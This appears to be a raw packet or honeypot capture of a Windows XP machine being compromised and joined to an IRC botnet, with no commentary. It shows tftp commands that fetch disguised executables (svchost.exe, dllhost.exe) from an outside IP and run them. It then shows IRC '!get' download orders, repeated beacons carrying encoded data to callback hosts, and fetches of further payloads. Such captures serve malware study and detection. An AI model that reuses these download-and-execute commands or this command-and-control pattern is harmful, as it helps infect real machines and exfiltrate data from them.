VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.
    C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is 3CF1-1DE8
    Directory of C:\\WINDOWS\\system32\\wins
    File Not Found
    C:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is 3CF1-1DE8
    Directory of C:\\WINDOWS\\system32\\dllcache
    File Not Found
    C:\\WINDOWS\\system32>
VICTIM: tftp -i 70.165.19.238 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: \000\004\000) VICTIM: \000\004\000* VICTIM: \000\004\000+ VICTIM: \000\004\000, VICTIM: \000\004\000- VICTIM: \000\004\000.
VICTIM: \000\004\000/ VICTIM: \000\004\0000 VICTIM: \000\004\0001 VICTIM: \000\004\0002 VICTIM: \000\004\0003 VICTIM: \000\004\0004 VICTIM: \000\004\0005 VICTIM: \000\004\0006 VICTIM: \000\004\0007 VICTIM: \000\004\0008 VICTIM: \000\004\0009 VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 11 seconds, 2677 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 70.165.19.238 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 8 seconds, 2496 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK ztdmffth
    USER c020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG ztdmffth :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe
    :u. PRIVMSG ztdmffth :!get http:/nonetnet.com/kx4.txt
VICTIM: GET /kx4.txt HTTP/1.0
    User-Agent: Download
    Host: nonetnet.com
    Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2869C1DC99CA9E5FF6F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.4882318 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: mewgost.com
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /p/goo.exe?t=0.8900873 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: nonetnet.com
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=E8F68A6E56C6CB1E0F13CEE49FD3EA29009E4B2D7724BE23B180F3BA8F2183A57C35849243297658BB87C4B6CCF339DF95590BB7B729785A177203AB963FCDBE87C8ACD0F5F4E17EF5CFA3D9907ED40B12E5A39EC2BCE0E645E74C2141A839BCFC98233E0914379840F3DB5C9696B62C8D7AD2FD5611BD9AE0B9DFB05EE85FE1111A4BE25C68DF6063591D4E&t=0.8389398 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: mewgost.com
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=66782CC858C8499C4A563B113F7397549608F89E623163FED2E3A1E896387F599ED71F09AEC4BD938EB28CFEF1CE9C7A39F5F24ECA54280A8DE856FEC26B1B68652AF589ACAD48D75E64CDB71FF13AE5E6115F622A54181E9537B4D942ABCB4EC1A59E837F6263CC4DFE40D608F1B73FC134D08ECC9F4C7EA0B49CE974D67983F5E54BED95B8C80B3003663229E09EE230D1&t=0.3039057 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: mewgost.com
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: PING :i.
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
ATTACKER: GET /1.exe?t=0.9981806 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 193.218.156.90
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=8997CF2BDF4FB51211E197A7A6DD4783ED4D91F95073C1574F763547439888A25F171EF282EC1F7EDDEA196B7449E20907F17C97E745F8DFBD85B9C5542983EFE39C329465BD1986073D4F35B45A78A743B4CEF3D6A8757365C75B36987136B34E2A617C8895A10E982B1F98B8B8148E7B8CFED1BEF85770F2AB224DFF49CF71191F3F982E1FF430DAEEAEF90FC60478&t=0.6162836 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: mewgost.com
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /images/3418.exe?t=0.9366571 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 78.41.203.201
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=7D63A84C8B1B21894CA0F9D39AD32AEFD070CDA540631681B3D6733A9B3D5C721B56CE2A142B91CDD9B3B6DC353BEA06E31A9B2DBAD4FDDE05336B1EEA6AC75AD3ADB6C5282BF36CE2D8106AC52B598638CFB8851866C6C000A2761BD138FB7E82E6CAD78A97F85753E042C59F9F7AE0C93E2C034007C2E5B2EB6D02C47298264640B1164072902F5963C595599F8CF2&t=0.5385248 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: mewgost.com
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=2E3010F49D0DC860866A81AB1E570ECB9939D2BACBE868FFA7C296DFFC5A9FB1E3AE7C98B18E83DF6F05771D27292EC2877E1DABA9C78DAEFCCA4D38A9291B86E59B15660F0CF06F91ABD3A9D13FFB24C0379AA7C4BA8C8A12B0D7BAB1581590BFDB3429ACB1319E893ABC2AA158E56DEF1A401E30632614A4B0FA8FBB199C663F2F71DABD93A619340C9CC45D9A9E1F03E1&t=0.4465601 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: mewgost.com
    Connection: Keep-Alive
    Pragma: no-cache
VICTIM: POST /+30103.html HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    CB2: 1
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla
    Host: 87.120.166.58
    Connection: Keep-Alive
VICTIM: HTTP/1.0 200 OK
    YES